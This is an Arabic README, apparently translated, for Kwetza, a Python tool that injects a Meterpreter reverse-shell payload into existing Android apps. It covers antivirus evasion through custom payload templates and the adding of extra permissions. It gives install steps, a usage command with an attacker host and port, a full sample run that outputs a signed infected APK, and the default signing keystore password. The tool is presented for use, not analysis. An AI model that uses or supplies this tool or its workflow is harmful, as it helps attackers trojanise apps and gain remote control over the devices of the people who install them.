
نص برمجي بايثون لحقن تطبيقات أندرويد موجودة بحمولة Meterpreter.
بقلم كريس لو روي (@brompwnie) [email protected]
Kwetza هي أداة تسمح لك بإصابة تطبيق Android موجود بحمولة Meterpreter.
تقوم Kwetza بإصابة تطبيق Android موجود إما بقوالب حمولة مخصصة أو افتراضية لتجنب اكتشافها بواسطة برامج مكافحة الفيروسات. تتيح لك Kwetza إصابة تطبيقات Android باستخدام الأذونات الافتراضية للتطبيق المستهدف أو إضافة أذونات إضافية للحصول على وظائف إضافية.
يمكن العثور على الخطوات اليدوية التي تقوم Kwetza بأتمتتها هنا: https://sensepost.com/blog/2016/kwetza-infecting-android-applications/
أولاً، احصل على الكود:
git clone https://github.com/sensepost/kwetza.git
Kwetza مكتوبة بلغة Python وتتطلب BeautifulSoup والتي يمكن تثبيتها باستخدام Pip:
pip install beautifulsoup4
تتطلب Kwetza تثبيت Apktool وجعله متاحًا عبر PATH الخاص بك. يمكن إعداد ذلك باستخدام تعليمات التثبيت الموجودة هنا: https://ibotpeaches.github.io/Apktool/install
python kwetza.py nameOfTheApkToInfect.apk https/tcp LHOST LPORT yes/no customClass
python kwetza.py hackme.apk https 10.42.0.118 4444 yes com.moo.another.activity
[+] MMMMMM KWETZA
[*] DECOMPILING TARGET APK
[+] ENDPOINT IP: 10.42.0.118
[+] ENDPOINT PORT: 4444
[+] APKTOOL DECOMPILED SUCCESS
[*] BYTING COMMS...
[*] ANALYZING ANDROID MANIFEST...
[+] TARGET ACTIVITY: com.foo.moo.gui.MainActivity
[*] INJECTION INTO APK
[+] CHECKING IF ADDITIONAL PERMS TO BE ADDED
[*] INJECTION OF CRAZY PERMS TO BE DONE!
[+] TIME TO BUILD INFECTED APK
[*] EXECUTING APKTOOL BUILD COMMAND
[+] BUILD RESULT
############################################
I: Using APktool 2.2.0
I: Checking whether source shas changed...
I: Smaling smali folder into classes.dex
I: Checking whether resources has changed...
I: Building resources...
I: Copying libs ...(/lib)
I: Building apk file...
I: Copying unknown files/dir...
###########################################
[*] EXECUTING JARSIGNER COMMAND...
Enter Passphrase for keystore: password
[+] JARSIGNER RESULT
###########################################
jar signed.
###########################################
[+] L00t located at hackme/dist/hackme.apk
تم تطوير Kwetza للعمل مع Python 2.
بشكل افتراضي، ستستخدم Kwetza القالب ومخزن المفاتيح الموجودين في مجلد "payload" لحقن وتوقيع ملف apk المصاب.
إذا كنت ترغب في توقيع التطبيق المصاب بشهادتك الخاصة، فأنشئ مخزن مفاتيح جديد وضعه في مجلد "payload" وأعد تسميته ليطابق مخزن المفاتيح الحالي أو قم بتغيير المرجع في kwetza.py.
يمكن فعل الشيء نفسه لقوالب الحمولة.
كلمة المرور لمخزن المفاتيح الافتراضي هي، حسنًا، "password".
Kwetza مرخصة بموجب رخصة المشاع الإبداعي نسب المصنف - غير تجاري - المشاركة بالمثل 4.0 دولي (http://creativecommons.org/licenses/by-nc-sa/4.0).
قد تكون الأذونات التي تتجاوز نطاق هذه الترخيص متاحة على http://sensepost.com/contact.